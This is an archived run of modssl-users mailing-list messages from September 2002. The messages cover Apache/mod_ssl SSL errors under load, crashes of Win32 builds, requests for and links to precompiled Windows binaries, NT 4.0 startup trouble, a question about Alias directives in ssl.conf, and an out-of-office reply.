http://tor.ath.cx/~hunter/apache/Openssl-0.9.6g-Win32.zip

I built the openssl with masm as well by the way.

chris

P.S.
I cannot handle a lot of traffic and suffer from (relatively) slow 
transfer rate. (ADSL Modem with Sympatico)




______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep 18 15:06:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA10653; Wed, 18 Sep 2002 15:05:35 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from th04.opsion.fr id PAA10542; Wed, 18 Sep 2002 15:04:13 +0200 (MET DST)
Received: from 212.180.95.194 [212.180.95.194] by th04.opsion.fr id 200209181302.32d6; Wed, 18 Sep 2002 13:02:51 GMT
Message-ID: <3D8879F3.9000702@ifrance.com>
Date: Wed, 18 Sep 2002 15:04:51 +0200
From: Estrade Matthieu 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.1) Gecko/20020809
X-Accept-Language: fr-fr, en-us, en
MIME-Version: 1.0
To: dev@httpd.apache.org, modssl-users@modssl.org
Subject: Apache 2.0 OpenSSL error
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Estrade Matthieu 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

for few days, i am stressing my apache 2.0.40 with reverse proxy with a 
tools named Silkperformer.
i have a really strange error, coming up often on some basic requests:

the request is http://web2.test.com/manual/images/pixel.gif

[Wed Sep 18 12:24:04 2002] [error] SSL error on reading data
[Wed Sep 18 12:24:04 2002] [error] SSL Library Error: 336151579 
error:1409441B:lib(20):func(148):reason(1051)

I tested httpd-2.0.36 and i have the same error, so i tried with openssl 
0.9.6g and 0.9.6d and the error is still here !
I tested with apache 1.3.26 and i don't get the error.

If i force the client to do HTTP/1.0 on httpd-2.0.36, i still have the 
errors.
If i benchmark with others product, depending on the product, i have or 
not the error

I found on google 2 e-mails talking about the same error i have, but 
it's on apache 1.3 so i don't understand at all.
I will try to find more information about the context of the error.

If someone have an idea,

Matthieu


________________________________________________________________
Etudiant: Wanadoo t'offre le Pack eXtense Haut Débit soit 150,92 euros d'économies !
Et pour 1 euro de plus, reçois le CD-ROM du jeu Dark Age of Camelot
+ 1 mois de jeu en réseau offert ! 
Clique ici : http://www.ifrance.com/_reloc/mail.etudiant 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep 18 15:22:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA11416; Wed, 18 Sep 2002 15:21:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pimout3-ext.prodigy.net id PAA11412; Wed, 18 Sep 2002 15:20:19 +0200 (MET DST)
Received: from MAUCHI (adsl-66-136-203-103.dsl.austtx.swbell.net [66.136.203.103])
	by pimout3-ext.prodigy.net (8.12.3 da nor stuldap/8.12.3) with SMTP id g8IDKFGT390784
	for ; Wed, 18 Sep 2002 09:20:15 -0400
Message-ID: <0c0e01c25f16$278ff420$0100a8c0@MAUCHI>
From: "Ivelin Ivanov" 
To: 
References: <3D8879F3.9000702@ifrance.com>
Subject: Re: Apache 2.0 OpenSSL error
Date: Wed, 18 Sep 2002 08:20:26 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ivelin Ivanov" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Unfortunately I don't have the answer, but
I am sharing the same problem.
See the email that I sent to the list a few days ago (attached below).

I am very interested in a solution myself.
Will let you know if I find one first.


Ivelin

---------


Dear mod_ssl group,

We have been trying to use in production the precompiled Apache with mod_ssl
from the precompiled version in the contrib directory:
http://www.modssl.org/contrib/ftp/contrib/Apache-2.0.39-Mod_SSL-OpenSSL-0.9.
6d-Win32.zip


It behaves very stable over weeks and performs nice under heavy http load.

However when we run load tests over https, the server breaks after a day or
two.
All the log files look normal until the time of the crash.
Only the error.log suggests problems. I have attached it below.

Our system is Windows 2000 Professional with 1G RAM, 2 Intel CPUs.

Appears that when run under load against https URLs, the server gets
overloaded and restarts every few hours.

We are now running it again and collecting CPU and memory parameters over
time, which I can provide if requested.


Your help will be appreciated,


Best regards,


-= Ivelin =-

error.log excerpt:
-------------------

[Tue Sep 10 17:02:40 2002] [notice] Parent: Created child process 2056
[Tue Sep 10 17:02:42 2002] [notice] Child 2056: Child process is running
[Tue Sep 10 17:02:42 2002] [notice] Child 2056: Acquired the start mutex.
[Tue Sep 10 17:02:42 2002] [notice] Child 2056: Starting 450 worker threads.
[Tue Sep 10 17:03:17 2002] [notice] Parent: Received shutdown signal --
Shutting down the server.
[Tue Sep 10 17:03:17 2002] [notice] Child 2056: Exit event signaled. Child
process is ending.
[Tue Sep 10 17:03:18 2002] [notice] Child 2056: Released the start mutex
[Tue Sep 10 17:03:19 2002] [notice] Child 2056: Waiting for 450 worker
threads to exit.
[Tue Sep 10 17:03:19 2002] [notice] Child 2056: All worker threads have
exited.
[Tue Sep 10 17:03:19 2002] [notice] Child 2056: Child process is exiting
[Tue Sep 10 17:03:19 2002] [notice] Parent: Child process exited
successfully.
[Tue Sep 10 17:04:49 2002] [notice] Parent: Created child process 2056
[Tue Sep 10 17:04:53 2002] [notice] Child 2056: Child process is running
[Tue Sep 10 17:04:53 2002] [notice] Child 2056: Acquired the start mutex.
[Tue Sep 10 17:04:53 2002] [notice] Child 2056: Starting 450 worker threads.
[Wed Sep 11 01:34:28 2002] [notice] Parent: child process exited with status
3221225477 -- Restarting.
[Wed Sep 11 01:34:32 2002] [notice] Parent: Created child process 3292
[Wed Sep 11 01:34:34 2002] [notice] Child 3292: Child process is running
[Wed Sep 11 01:34:34 2002] [notice] Child 3292: Acquired the start mutex.
[Wed Sep 11 01:34:34 2002] [notice] Child 3292: Starting 450 worker threads.
[Wed Sep 11 04:13:11 2002] [notice] Parent: child process exited with status
3221225477 -- Restarting.
[Wed Sep 11 04:13:12 2002] [notice] Parent: Created child process 3496
[Wed Sep 11 04:13:14 2002] [notice] Child 3496: Child process is running
[Wed Sep 11 04:13:14 2002] [notice] Child 3496: Acquired the start mutex.
[Wed Sep 11 04:13:14 2002] [notice] Child 3496: Starting 450 worker threads.
[Wed Sep 11 10:01:43 2002] [notice] Parent: child process exited with status
3221225477 -- Restarting.
[Wed Sep 11 10:01:44 2002] [notice] Parent: Created child process 2556
[Wed Sep 11 10:01:47 2002] [notice] Child 2556: Child process is running
[Wed Sep 11 10:01:47 2002] [notice] Child 2556: Acquired the start mutex.
[Wed Sep 11 10:01:47 2002] [notice] Child 2556: Starting 450 worker threads.
[Wed Sep 11 14:42:06 2002] [notice] Parent: Received shutdown signal --
Shutting down the server.
[Wed Sep 11 14:42:06 2002] [notice] Child 2556: Exit event signaled. Child
process is ending.
[Wed Sep 11 14:42:07 2002] [notice] Child 2556: Released the start mutex
[Wed Sep 11 14:42:08 2002] [notice] Child 2556: Waiting for 450 worker
threads to exit.
[Wed Sep 11 14:42:08 2002] [notice] Child 2556: All worker threads have
exited.
[Wed Sep 11 14:42:08 2002] [notice] Child 2556: Child process is exiting
[Wed Sep 11 14:42:08 2002] [notice] Parent: Child process exited
successfully.
[Wed Sep 11 14:42:23 2002] [notice] Parent: Created child process 3840
[Wed Sep 11 14:42:24 2002] [notice] Child 3840: Child process is running
[Wed Sep 11 14:42:24 2002] [notice] Child 3840: Acquired the start mutex.
[Wed Sep 11 14:42:24 2002] [notice] Child 3840: Starting 450 worker threads.
[Wed Sep 11 15:02:29 2002] [notice] Parent: child process exited with status
3221225477 -- Restarting.
[Wed Sep 11 15:02:30 2002] [notice] Parent: Created child process 3460
[Wed Sep 11 15:02:32 2002] [notice] Child 3460: Child process is running
[Wed Sep 11 15:02:32 2002] [notice] Child 3460: Acquired the start mutex.
[Wed Sep 11 15:02:32 2002] [notice] Child 3460: Starting 450 worker threads.
[Wed Sep 11 21:20:43 2002] [notice] Parent: child process exited with status
3221225477 -- Restarting.
[Wed Sep 11 21:20:44 2002] [notice] Parent: Created child process 1856
[Wed Sep 11 21:20:46 2002] [notice] Child 1856: Child process is running
[Wed Sep 11 21:20:46 2002] [notice] Child 1856: Acquired the start mutex.
[Wed Sep 11 21:20:46 2002] [notice] Child 1856: Starting 450 worker threads.
[Wed Sep 11 21:36:56 2002] [notice] Parent: Created child process 3852
[Wed Sep 11 21:36:58 2002] [notice] Child 3852: Child process is running
[Wed Sep 11 21:36:58 2002] [notice] Child 3852: Acquired the start mutex.
[Wed Sep 11 21:36:58 2002] [notice] Child 3852: Starting 450 worker threads.
[Thu Sep 12 00:16:36 2002] [warn] Server ran out of threads to serve
requests. Consider raising the ThreadsPerChild setting
[Thu Sep 12 19:34:04 2002] [notice] Parent: Received shutdown signal --
Shutting down the server.
[Thu Sep 12 19:34:04 2002] [notice] Child 3852: Exit event signaled. Child
process is ending.
[Thu Sep 12 19:34:34 2002] [notice] Parent: Forcing termination of child
process 272
[Thu Sep 12 19:34:43 2002] [notice] Parent: Created child process 2452
[Thu Sep 12 19:34:44 2002] [notice] Child 2452: Child process is running
[Thu Sep 12 19:34:44 2002] [notice] Child 2452: Acquired the start mutex.
[Thu Sep 12 19:34:44 2002] [notice] Child 2452: Starting 450 worker threads.
[Fri Sep 13 00:03:45 2002] [notice] Parent: child process exited with status
3221225477 -- Restarting.
[Fri Sep 13 00:03:47 2002] [notice] Parent: Created child process 992
[Fri Sep 13 00:03:48 2002] [notice] Child 992: Child process is running
[Fri Sep 13 00:03:48 2002] [notice] Child 992: Acquired the start mutex.
[Fri Sep 13 00:03:49 2002] [notice] Child 992: Starting 450 worker threads.
[Fri Sep 13 02:08:49 2002] [notice] Parent: child process exited with status
3221225477 -- Restarting.
[Fri Sep 13 02:08:51 2002] [notice] Parent: Created child process 4376
[Fri Sep 13 02:08:53 2002] [notice] Child 4376: Child process is running
[Fri Sep 13 02:08:53 2002] [notice] Child 4376: Acquired the start mutex.
---->[Fri Sep 13 02:08:53 2002] [notice] Child 4376: Starting 450 worker
threads.
[Fri Sep 13 02:10:45 2002] [warn] Server ran out of threads to serve
requests. Consider raising the ThreadsPerChild setting
[Fri Sep 13 17:05:10 2002] [notice] Parent: child process exited with status
1 -- Restarting.
[Fri Sep 13 17:05:11 2002] [notice] Parent: Created child process 4060
[Fri Sep 13 17:05:13 2002] [notice] Child 4060: Child process is running
[Fri Sep 13 17:05:13 2002] [notice] Child 4060: Acquired the start mutex.
[Fri Sep 13 17:05:13 2002] [notice] Child 4060: Starting 450 worker threads.
[Fri Sep 13 17:07:23 2002] [notice] Parent: Created child process 4400
[Fri Sep 13 17:07:25 2002] [notice] Child 4400: Child process is running
[Fri Sep 13 17:07:25 2002] [notice] Child 4400: Acquired the start mutex.
[Fri Sep 13 17:07:25 2002] [notice] Child 4400: Starting 450 worker threads.
[Mon Sep 16 22:02:05 2002] [notice] Parent: Received shutdown signal --
Shutting down the server.
[Mon Sep 16 22:02:05 2002] [notice] Child 4400: Exit event signaled. Child
process is ending.
[Mon Sep 16 22:02:06 2002] [notice] Child 4400: Released the start mutex
[Mon Sep 16 22:02:11 2002] [notice] Child 4400: Waiting for 450 worker
threads to exit.
[Mon Sep 16 22:02:11 2002] [notice] Child 4400: All worker threads have
exited.
[Mon Sep 16 22:02:11 2002] [notice] Child 4400: Child process is exiting
[Mon Sep 16 22:02:12 2002] [notice] Parent: Child process exited
successfully.
-=Ivelin=-



----- Original Message -----
From: "Estrade Matthieu" 
To: ; 
Sent: Wednesday, September 18, 2002 8:04 AM
Subject: Apache 2.0 OpenSSL error


Hi,

for few days, i am stressing my apache 2.0.40 with reverse proxy with a
tools named Silkperformer.
i have a really strange error, coming up often on some basic requests:

the request is http://web2.test.com/manual/images/pixel.gif

[Wed Sep 18 12:24:04 2002] [error] SSL error on reading data
[Wed Sep 18 12:24:04 2002] [error] SSL Library Error: 336151579
error:1409441B:lib(20):func(148):reason(1051)

I tested httpd-2.0.36 and i have the same error, so i tried with openssl
0.9.6g and 0.9.6d and the error is still here !
I tested with apache 1.3.26 and i don't get the error.

If i force the client to do HTTP/1.0 on httpd-2.0.36, i still have the
errors.
If i benchmark with others product, depending on the product, i have or
not the error

I found on google 2 e-mails talking about the same error i have, but
it's on apache 1.3 so i don't understand at all.
I will try to find more information about the context of the error.

If someone have an idea,

Matthieu


________________________________________________________________
Etudiant: Wanadoo t'offre le Pack eXtense Haut Débit soit 150,92 euros
d'économies !
Et pour 1 euro de plus, reçois le CD-ROM du jeu Dark Age of Camelot
+ 1 mois de jeu en réseau offert !
Clique ici : http://www.ifrance.com/_reloc/mail.etudiant

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep 18 16:13:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA13338; Wed, 18 Sep 2002 16:12:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id QAA13300; Wed, 18 Sep 2002 16:11:05 +0200 (MET DST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Wed, 18 Sep 2002 07:10:56 -0700
Received: from 204.115.33.49 by lw7fd.law7.hotmail.msn.com with HTTP;
	Wed, 18 Sep 2002 14:10:56 GMT
X-Originating-IP: [204.115.33.49]
From: "Jim Lee" 
To: modssl-users@modssl.org
Subject: http://www.modssl.org/contrib/ Folder
Date: Wed, 18 Sep 2002 14:10:56 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 18 Sep 2002 14:10:56.0522 (UTC) FILETIME=[34DA7EA0:01C25F1D]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jim Lee" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Previously modssl users used to be able to post their contributions to this 
area ( http://www.modssl.org/contrib/  ).

But right now i find that the page looks a lot different and it seems that 
users are not contributing to this area any more.

I wish to know more about this. Any insights from our modssl-users friends 
would be very helpful not only to me but many others like me.

Bye,
-Jim

>From: hunter Reply-To: modssl-users@modssl.org
>To: modssl-users@modssl.org
>Subject: Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
>Date: Wed, 18 Sep 2002 05:51:56 -0400
>
>Jim Lee wrote:
>>Hi,
>>
>>Since i am a windows user, i am looking for an already compiled file:
>>Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
>>
>>Since i do not have any compilers installed, i would really appreciate if 
>>any of our UNIX friends could help our WINDOWS collegues and post the 
>>Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip file in the 
>>following location: http://www.modssl.org/contrib/ftp/contrib/
>>
>>Thanks,
>>
>>Bye,
>>-Jim.
>>
>>>From: Horst To: Jim Lee 
>>>Subject: Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
>>>Date: Tue, 17 Sep 2002 20:42:08 -0700 (PDT)
>>>
>>>Hi Jim,
>>>I didn't read all the previous messages and the reference to
>>>http://www.modssl.org/contrib/ftp/contrib/
>>>  but I'd guess you can google for the 3 independent files.
>>>That's how I found Apache_1.3.26 and Mod_SSL_2.8.10 recently.
>>>
>>>  - Horst (ohh, just realizing you are on Win - I am on linux and got the
>>>RPMs with no problem)
>>>
>>>
>>>On Wed, 18 Sep 2002, Jim Lee wrote:
>>>
>>> > I have been unable to find the file:
>>> >
>>> > Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
>>> >
>>> > at the following location:
>>> >
>>> > http://www.modssl.org/contrib/ftp/contrib/
>>> >
>>> > Any help from our fellow members in the group would be higly 
>>>appreciated in
>>> > view of the recent openSSL worm virus alerts.
>>> >
>>> > Thanks and Regards,
>>> >
>>> > Bye,
>>> > -Jim.
>>> >
>>> >
>>> > >From: Paul
>>
>>To: jimlee2@hotmail.com
>>
>>> > >Subject: Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
>>> > >Date: Wed, 18 Sep 2002 09:02:41 +1200
>>> > >
>>> > > > Hi,
>>> > > >
>>> > > > I am looking for the following file:
>>> > > >
>>> > > >
>>> > > > Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
>>> > > >
>>> > > >
>>> > > > in the     http://www.modssl.org/contrib/ftp/contrib/       
>>>folder.
>>> > > >
>>> > > >
>>> > > > If anyone could contribute this file, i would highly appreciate 
>>>it.
>>> > > >
>>> > >
>>> > >Hi Jim,
>>> > >
>>> > >I'm looking for that file too!  Did you have any luck.
>>> > >
>>> > >Cheers, Paul.
>>> > >--
>>> >
>>> >
>>> >
>>> >
>>> > _________________________________________________________________
>>
>>
>>
>>
>>
>>
>>_________________________________________________________________
>>MSN Photos is the easiest way to share and print your photos: 
>>http://photos.msn.com/support/worldwide.aspx
>>
>>______________________________________________________________________
>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>User Support Mailing List                      modssl-users@modssl.org
>>Automated List Manager                            majordomo@modssl.org
>>
>Jim and/or Paul,
>
>I don't know how to contribute... I will find out, but it is late and I 
>want to go to bed.  Maybe someone can put these into 
>http://www.modssl.org/contrib/ftp/contrib/ for me.  And, someone could 
>shorten the path to the knowledge of how to submit the code for 
>contribution -- I tried ftp'ing and could not write (no suprise).
>
>I have binaries (untested) for the releases you are after.
>(I am running Apache 2.0.40 but can easily build the code for these 
>versions - configuring and testing it is more work and I leave that up to 
>you).
>
>If you have any problem with the code I will spend some more time on it 
>later in the evening - send me a note (theantigod@sympatico.ca or 
>hunter@tor.ath.cx).
>
>http://tor.ath.cx/~hunter/apache/Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
>http://tor.ath.cx/~hunter/apache/Openssl-0.9.6g-Win32.zip
>
>I built the openssl with masm as well by the way.
>
>chris
>
>P.S.
>I cannot handle a lot of traffic and suffer from (relatively) slow transfer 
>rate. (ADSL Modem with Sympatico)
>
>
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org




_________________________________________________________________
MSN Photos is the easiest way to share and print your photos: 
http://photos.msn.com/support/worldwide.aspx

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep 18 17:47:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA15811; Wed, 18 Sep 2002 17:46:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from atlaspdc.atlas-tech.com id RAA15807; Wed, 18 Sep 2002 17:45:43 +0200 (MET DST)
Received: from atlas-tech.com (sc021ws036.nosc.mil [198.253.21.36]) by atlaspdc.atlas-tech.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21)
	id Q5ZYY9J4; Wed, 18 Sep 2002 11:44:37 -0400
Message-ID: <3D88A011.70419860@atlas-tech.com>
Date: Wed, 18 Sep 2002 11:47:30 -0400
From: David Diehl 
X-Mailer: Mozilla 4.73 [en] (Windows NT 5.0; U)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
References:  <3D884CBC.6090208@sympatico.ca>
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: David Diehl 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users



I did find a compiled copy at  http://www.opensa.org/download/100.html.

However, I can't seem to get it to work on a NT 4.0 Server. It seems
to work fine on a 2000 server but when I start it on NT 4.0, the first
apache process seems to kick off fine, but the 2nd process never starts
and no errors are observed in any of the log files. I've also downloaded
and compiled it and I'm still running into the same problem i.e. works
fine on 2000 but not on NT 4.0. Has anybody ran into this problem?

David Diehl

hunter wrote:

Jim Lee wrote:

> Hi,

>

> Since i am a windows user, i am looking for an already compiled file:

> Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip

>

> Since i do not have any compilers installed, i would really appreciate

> if any of our UNIX friends could help our WINDOWS collegues and post
the

> Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip file in the

> following location: http://www.modssl.org/contrib/ftp/contrib/

>

> Thanks,

>

> Bye,

> -Jim.

>

>> From: Horst To: Jim Lee <jimlee2@hotmail.com>

>> Subject: Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip

>> Date: Tue, 17 Sep 2002 20:42:08 -0700 (PDT)

>>

>> Hi Jim,

>> I didn't read all the previous messages and the reference to

>> http://www.modssl.org/contrib/ftp/contrib/

>>  but I'd guess you can google for the 3 independent files.

>> That's how I found Apache_1.3.26 and Mod_SSL_2.8.10 recently.

>>

>>  - Horst (ohh, just realizing you are on Win - I am on linux
and got the

>> RPMs with no problem)

>>

>>

>> On Wed, 18 Sep 2002, Jim Lee wrote:

>>

>> > I have been unable to find the file:

>> >

>> > Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip

>> >

>> > at the following location:

>> >

>> > http://www.modssl.org/contrib/ftp/contrib/

>> >

>> > Any help from our fellow members in the group would be higly

>> appreciated in

>> > view of the recent openSSL worm virus alerts.

>> >

>> > Thanks and Regards,

>> >

>> > Bye,

>> > -Jim.

>> >

>> >

>> > >From: Paul

>

> To: jimlee2@hotmail.com

>

>> > >Subject: Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip

>> > >Date: Wed, 18 Sep 2002 09:02:41 +1200

>> > >

>> > > > Hi,

>> > > >

>> > > > I am looking for the following file:

>> > > >

>> > > >

>> > > > Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip

>> > > >

>> > > >

>> > > > in the     http://www.modssl.org/contrib/ftp/contrib/      
folder.

>> > > >

>> > > >

>> > > > If anyone could contribute this file, i would highly appreciate
it.

>> > > >

>> > >

>> > >Hi Jim,

>> > >

>> > >I'm looking for that file too!  Did you have any luck.

>> > >

>> > >Cheers, Paul.

>> > >--

>> >

>> >

>> >

>> >

>> > _________________________________________________________________

>

>

>

>

>

>

> _________________________________________________________________

> MSN Photos is the easiest way to share and print your photos:

> http://photos.msn.com/support/worldwide.aspx

>

> ______________________________________________________________________

> Apache Interface to OpenSSL (mod_ssl)                  
www.modssl.org

> User Support Mailing List                     
modssl-users@modssl.org

> Automated List Manager                           
majordomo@modssl.org

>

Jim and/or Paul,

I don't know how to contribute... I will find out, but it is late and
I

want to go to bed.  Maybe someone can put these into

http://www.modssl.org/contrib/ftp/contrib/
for me.  And, someone could

shorten the path to the knowledge of how to submit the code for

contribution -- I tried ftp'ing and could not write (no suprise).

I have binaries (untested) for the releases you are after.

(I am running Apache 2.0.40 but can easily build the code for these

versions - configuring and testing it is more work and I leave that
up

to you).

If you have any problem with the code I will spend some more time on
it

later in the evening - send me a note (theantigod@sympatico.ca or

hunter@tor.ath.cx).

http://tor.ath.cx/~hunter/apache/Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip

http://tor.ath.cx/~hunter/apache/Openssl-0.9.6g-Win32.zip

I built the openssl with masm as well by the way.

chris

P.S.

I cannot handle a lot of traffic and suffer from (relatively) slow

transfer rate. (ADSL Modem with Sympatico)

______________________________________________________________________

Apache Interface to OpenSSL (mod_ssl)                  
www.modssl.org

User Support Mailing List                     
modssl-users@modssl.org

Automated List Manager                           
majordomo@modssl.org



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep 18 21:40:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA21615; Wed, 18 Sep 2002 21:38:32 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.storagecommander.com id VAA21607; Wed, 18 Sep 2002 21:37:47 +0200 (MET DST)
Received: from rtfm (host_254 [192.168.0.254])
	by mail.storagecommander.com (8.11.6/8.11.2) with SMTP id g8IJeAk27490
	for ; Wed, 18 Sep 2002 12:40:11 -0700
Message-ID: <00f601c25f4a$f87b6450$6900a8c0@rtfm>
From: "Matias Silva" 
To: "User Group mod_ssl" 
Subject: Using Aliases and SSL
Date: Wed, 18 Sep 2002 12:38:31 -0700
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_00F3_01C25F10.4BFE07D0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Matias Silva" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_00F3_01C25F10.4BFE07D0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Can anybody assist me, in using Aliases with ssl?. =20

I placed several Alias directives within the ssl.conf file specifically =
where the virtual host is defined. =20
This was to help assist in organizing the Apache server.  Of course its =
not working.

Where should I place Alias Directives that need to be included in the =
ssl area of the server ?
or Does SSL even work with Aliases?

Cheers
-Matt

------=_NextPart_000_00F3_01C25F10.4BFE07D0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Can anybody assist me, in using Aliases =
with=20
ssl?.  


 


I placed several Alias directives =
within=20
the ssl.conf file specifically where =
the virtual=20
host is defined.  


This was to help assist in =
organizing the=20
Apache server.  Of course its not working.


 


Where should I place Alias =
Directives that=20
need to be included in the ssl area of the server ?


or Does SSL even work with =
Aliases?


 


Cheers


-Matt


------=_NextPart_000_00F3_01C25F10.4BFE07D0--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep 18 21:43:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA21725; Wed, 18 Sep 2002 21:42:32 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mhub.AXP.MDX.AC.UK id VAA21711; Wed, 18 Sep 2002 21:41:50 +0200 (MET DST)
Received: from CONVERSION-DAEMON.mdx.ac.uk by mdx.ac.uk (PMDF V6.1-1 #38636)
 id <01KMNR27OYHC00HTGN@mdx.ac.uk> for modssl-users@modssl.org; Wed,
 18 Sep 2002 20:42:01 +0100 (BST)
Received: from mdx-nwsup1.nw.mdx.ac.uk (mdx-nwsup1.mdx.ac.uk [158.94.57.9])
 by mdx.ac.uk (PMDF V6.1-1 #38636) with ESMTP id <01KMNR27EXRQ00M3MP@mdx.ac.uk>
 for modssl-users@modssl.org; Wed, 18 Sep 2002 20:42:01 +0100 (BST)
Received: from MDX-NWSUP1/SpoolDir by mdx-nwsup1.nw.mdx.ac.uk (Mercury 1.48)
 ; Wed, 18 Sep 2002 20:39:14 +0000
Received: from SpoolDir by MDX-NWSUP1 (Mercury 1.48); Wed,
 18 Sep 2002 20:39:11 +0000
Date: Wed, 18 Sep 2002 20:38:41 +0000
From: a.moon@mdx.ac.uk
Subject: Using Aliases and SSL
To: modssl-users@modssl.org
Message-id: <18255AF5D19@mdx-nwsup1.nw.mdx.ac.uk>
Content-transfer-encoding: 7BIT
X-Autoreply-From: 
X-Comment: Middlesex University has scanned this message for viruses.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: a.moon@mdx.ac.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Due to unaviodable circumstances, I am away from the office until the Monday 30th September 2002 

I will get back to you as soon as i can on my return.

If it's an urgent Online Learning Support Unit / Web/ MUBSWEB/ MUBS Online matter
that requires urgent attention then  please contact either  Kirsteen1, Sanjay1 or Jeff1
who should be able to help.

If the problem relates to mubsweb please contact sanjay1
If the probelm relates to OASIS or WebCT please contact Kirsteen1
